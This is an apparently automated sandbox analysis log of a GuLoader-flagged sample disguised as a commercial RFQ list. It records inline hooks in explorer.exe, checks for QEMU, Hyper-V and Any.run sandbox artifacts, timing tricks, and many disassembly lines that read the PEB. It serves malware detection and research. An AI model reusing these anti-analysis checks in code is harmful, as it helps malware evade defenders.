      Source: Binary string: colorcpl.pdb source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11591199372.0000000033141000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11593834689.0000000000110000.00000040.10000000.00040000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11620803992.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.16259139024.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: RFQINL0607_Commerical_list.exe, 00000002.00000001.11412040635.0000000000649000.00000020.00000001.01000000.00000005.sdmp
      Source: Binary string: wntdll.pdbUGP source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11505723007.0000000033179000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11499237617.0000000032FC5000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.16259673199.00000000044ED000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.16259673199.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.11592658015.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.11597611230.0000000004218000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: RFQINL0607_Commerical_list.exe, RFQINL0607_Commerical_list.exe, 00000002.00000003.11505723007.0000000033179000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11499237617.0000000032FC5000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.16259673199.00000000044ED000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.16259673199.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.11592658015.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.11597611230.0000000004218000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: RFQINL0607_Commerical_list.exe, 00000002.00000001.11412040635.0000000000649000.00000020.00000001.01000000.00000005.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000000.00000002.11502840826.00000000052CD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333508CD push ecx; mov dword ptr [esp], ecx2_2_333508D6
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeFile created: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dllJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x88 0x8E 0xE4
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: RFQINL0607_Commerical_list.exe, 00000000.00000002.11500754594.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE=S
      Source: RFQINL0607_Commerical_list.exe, 00000000.00000002.11502016945.0000000002AA0000.00000004.00001000.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11620968492.0000000004920000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: RFQINL0607_Commerical_list.exe, 00000000.00000002.11500754594.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXES,Q0
      Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7084Thread sleep count: 134 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7084Thread sleep time: -268000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33391763 rdtsc 2_2_33391763
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 863Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 889Jump to behavior
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeAPI coverage: 1.0 %
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeAPI call chain: ExitProcess graph end nodegraph_0-4097
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeAPI call chain: ExitProcess graph end nodegraph_0-4247
      Source: RFQINL0607_Commerical_list.exe, 00000000.00000002.11531595403.0000000010059000.00000004.00000800.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11621028529.0000000004989000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: RFQINL0607_Commerical_list.exe, 00000000.00000002.11500754594.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe=s
      Source: RFQINL0607_Commerical_list.exe, 00000000.00000002.11531595403.0000000010059000.00000004.00000800.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11621028529.0000000004989000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000002.11621028529.0000000004989000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: RFQINL0607_Commerical_list.exe, 00000000.00000002.11531595403.0000000010059000.00000004.00000800.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11621028529.0000000004989000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: explorer.exe, 00000004.00000002.16279705223.000000000C877000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000C877000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
      Source: RFQINL0607_Commerical_list.exe, 00000000.00000002.11531595403.0000000010059000.00000004.00000800.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11621028529.0000000004989000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: explorer.exe, 00000004.00000000.11530960876.000000000CDBB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16285862021.000000000CDC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12984871283.000000000CDC0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3
      Source: RFQINL0607_Commerical_list.exe, 00000000.00000002.11531595403.0000000010059000.00000004.00000800.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11621028529.0000000004989000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: RFQINL0607_Commerical_list.exe, 00000000.00000002.11500754594.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exes,q0
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000002.11621028529.0000000004989000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000002.11619820508.000000000301A000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11503614413.0000000003047000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11591520447.0000000003047000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11620301741.0000000003047000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12984871283.000000000CDE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16285862021.000000000CDE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000CDE3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: RFQINL0607_Commerical_list.exe, 00000000.00000002.11502016945.0000000002AA0000.00000004.00001000.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11620968492.0000000004920000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: RFQINL0607_Commerical_list.exe, 00000000.00000002.11531595403.0000000010059000.00000004.00000800.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11621028529.0000000004989000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: RFQINL0607_Commerical_list.exe, 00000000.00000002.11531595403.0000000010059000.00000004.00000800.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11621028529.0000000004989000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: RFQINL0607_Commerical_list.exe, 00000000.00000002.11531595403.0000000010059000.00000004.00000800.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11621028529.0000000004989000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11503614413.0000000003047000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000003.11591520447.0000000003047000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11620301741.0000000003047000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWl0
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000002.11621028529.0000000004989000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33391763 rdtsc 2_2_33391763
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337332D mov eax, dword ptr fs:[00000030h]2_2_3337332D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33388322 mov eax, dword ptr fs:[00000030h]2_2_33388322
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33388322 mov eax, dword ptr fs:[00000030h]2_2_33388322
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33388322 mov eax, dword ptr fs:[00000030h]2_2_33388322
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334E328 mov eax, dword ptr fs:[00000030h]2_2_3334E328
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334E328 mov eax, dword ptr fs:[00000030h]2_2_3334E328
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334E328 mov eax, dword ptr fs:[00000030h]2_2_3334E328
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336E310 mov eax, dword ptr fs:[00000030h]2_2_3336E310
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336E310 mov eax, dword ptr fs:[00000030h]2_2_3336E310
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336E310 mov eax, dword ptr fs:[00000030h]2_2_3336E310
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338631F mov eax, dword ptr fs:[00000030h]2_2_3338631F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333D330C mov eax, dword ptr fs:[00000030h]2_2_333D330C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333D330C mov eax, dword ptr fs:[00000030h]2_2_333D330C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333D330C mov eax, dword ptr fs:[00000030h]2_2_333D330C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333D330C mov eax, dword ptr fs:[00000030h]2_2_333D330C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33349303 mov eax, dword ptr fs:[00000030h]2_2_33349303
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33349303 mov eax, dword ptr fs:[00000030h]2_2_33349303
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3340F30A mov eax, dword ptr fs:[00000030h]2_2_3340F30A
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333D0371 mov eax, dword ptr fs:[00000030h]2_2_333D0371
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333D0371 mov eax, dword ptr fs:[00000030h]2_2_333D0371
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337237A mov eax, dword ptr fs:[00000030h]2_2_3337237A
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CE372 mov eax, dword ptr fs:[00000030h]2_2_333CE372
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CE372 mov eax, dword ptr fs:[00000030h]2_2_333CE372
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CE372 mov eax, dword ptr fs:[00000030h]2_2_333CE372
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CE372 mov eax, dword ptr fs:[00000030h]2_2_333CE372
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335B360 mov eax, dword ptr fs:[00000030h]2_2_3335B360
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335B360 mov eax, dword ptr fs:[00000030h]2_2_3335B360
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335B360 mov eax, dword ptr fs:[00000030h]2_2_3335B360
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335B360 mov eax, dword ptr fs:[00000030h]2_2_3335B360
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335B360 mov eax, dword ptr fs:[00000030h]2_2_3335B360
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335B360 mov eax, dword ptr fs:[00000030h]2_2_3335B360
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338E363 mov eax, dword ptr fs:[00000030h]2_2_3338E363
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338E363 mov eax, dword ptr fs:[00000030h]2_2_3338E363
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338E363 mov eax, dword ptr fs:[00000030h]2_2_3338E363
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338E363 mov eax, dword ptr fs:[00000030h]2_2_3338E363
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338E363 mov eax, dword ptr fs:[00000030h]2_2_3338E363
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338E363 mov eax, dword ptr fs:[00000030h]2_2_3338E363
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338E363 mov eax, dword ptr fs:[00000030h]2_2_3338E363
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338E363 mov eax, dword ptr fs:[00000030h]2_2_3338E363
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338A350 mov eax, dword ptr fs:[00000030h]2_2_3338A350
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33348347 mov eax, dword ptr fs:[00000030h]2_2_33348347
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33348347 mov eax, dword ptr fs:[00000030h]2_2_33348347
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33348347 mov eax, dword ptr fs:[00000030h]2_2_33348347
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33423336 mov eax, dword ptr fs:[00000030h]2_2_33423336
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CC3B0 mov eax, dword ptr fs:[00000030h]2_2_333CC3B0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333593A6 mov eax, dword ptr fs:[00000030h]2_2_333593A6
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333593A6 mov eax, dword ptr fs:[00000030h]2_2_333593A6
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337A390 mov eax, dword ptr fs:[00000030h]2_2_3337A390
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337A390 mov eax, dword ptr fs:[00000030h]2_2_3337A390
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337A390 mov eax, dword ptr fs:[00000030h]2_2_3337A390
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33351380 mov eax, dword ptr fs:[00000030h]2_2_33351380
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33351380 mov eax, dword ptr fs:[00000030h]2_2_33351380
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33351380 mov eax, dword ptr fs:[00000030h]2_2_33351380
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33351380 mov eax, dword ptr fs:[00000030h]2_2_33351380
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33351380 mov eax, dword ptr fs:[00000030h]2_2_33351380
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336F380 mov eax, dword ptr fs:[00000030h]2_2_3336F380
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336F380 mov eax, dword ptr fs:[00000030h]2_2_3336F380
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336F380 mov eax, dword ptr fs:[00000030h]2_2_3336F380
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336F380 mov eax, dword ptr fs:[00000030h]2_2_3336F380
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336F380 mov eax, dword ptr fs:[00000030h]2_2_3336F380
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336F380 mov eax, dword ptr fs:[00000030h]2_2_3336F380
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3340F38A mov eax, dword ptr fs:[00000030h]2_2_3340F38A
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333833D0 mov eax, dword ptr fs:[00000030h]2_2_333833D0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333D43D5 mov eax, dword ptr fs:[00000030h]2_2_333D43D5
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333843D0 mov ecx, dword ptr fs:[00000030h]2_2_333843D0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334C3C7 mov eax, dword ptr fs:[00000030h]2_2_3334C3C7
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334E3C0 mov eax, dword ptr fs:[00000030h]2_2_3334E3C0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334E3C0 mov eax, dword ptr fs:[00000030h]2_2_3334E3C0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334E3C0 mov eax, dword ptr fs:[00000030h]2_2_3334E3C0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333563CB mov eax, dword ptr fs:[00000030h]2_2_333563CB
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3340F247 mov eax, dword ptr fs:[00000030h]2_2_3340F247
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33370230 mov ecx, dword ptr fs:[00000030h]2_2_33370230
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341124C mov eax, dword ptr fs:[00000030h]2_2_3341124C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341124C mov eax, dword ptr fs:[00000030h]2_2_3341124C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341124C mov eax, dword ptr fs:[00000030h]2_2_3341124C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341124C mov eax, dword ptr fs:[00000030h]2_2_3341124C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338A22B mov eax, dword ptr fs:[00000030h]2_2_3338A22B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338A22B mov eax, dword ptr fs:[00000030h]2_2_3338A22B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338A22B mov eax, dword ptr fs:[00000030h]2_2_3338A22B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333D0227 mov eax, dword ptr fs:[00000030h]2_2_333D0227
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333D0227 mov eax, dword ptr fs:[00000030h]2_2_333D0227
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333D0227 mov eax, dword ptr fs:[00000030h]2_2_333D0227
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333DB214 mov eax, dword ptr fs:[00000030h]2_2_333DB214
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333DB214 mov eax, dword ptr fs:[00000030h]2_2_333DB214
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334821B mov eax, dword ptr fs:[00000030h]2_2_3334821B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3340D270 mov eax, dword ptr fs:[00000030h]2_2_3340D270
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334A200 mov eax, dword ptr fs:[00000030h]2_2_3334A200
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333E327E mov eax, dword ptr fs:[00000030h]2_2_333E327E
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333E327E mov eax, dword ptr fs:[00000030h]2_2_333E327E
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333E327E mov eax, dword ptr fs:[00000030h]2_2_333E327E
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333E327E mov eax, dword ptr fs:[00000030h]2_2_333E327E
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333E327E mov eax, dword ptr fs:[00000030h]2_2_333E327E
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333E327E mov eax, dword ptr fs:[00000030h]2_2_333E327E
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334B273 mov eax, dword ptr fs:[00000030h]2_2_3334B273
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334B273 mov eax, dword ptr fs:[00000030h]2_2_3334B273
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334B273 mov eax, dword ptr fs:[00000030h]2_2_3334B273
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337F24A mov eax, dword ptr fs:[00000030h]2_2_3337F24A
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334C2B0 mov ecx, dword ptr fs:[00000030h]2_2_3334C2B0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_334232C9 mov eax, dword ptr fs:[00000030h]2_2_334232C9
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333742AF mov eax, dword ptr fs:[00000030h]2_2_333742AF
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333742AF mov eax, dword ptr fs:[00000030h]2_2_333742AF
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333492AF mov eax, dword ptr fs:[00000030h]2_2_333492AF
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33357290 mov eax, dword ptr fs:[00000030h]2_2_33357290
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33357290 mov eax, dword ptr fs:[00000030h]2_2_33357290
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33357290 mov eax, dword ptr fs:[00000030h]2_2_33357290
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CE289 mov eax, dword ptr fs:[00000030h]2_2_333CE289
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333602F9 mov eax, dword ptr fs:[00000030h]2_2_333602F9
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333602F9 mov eax, dword ptr fs:[00000030h]2_2_333602F9
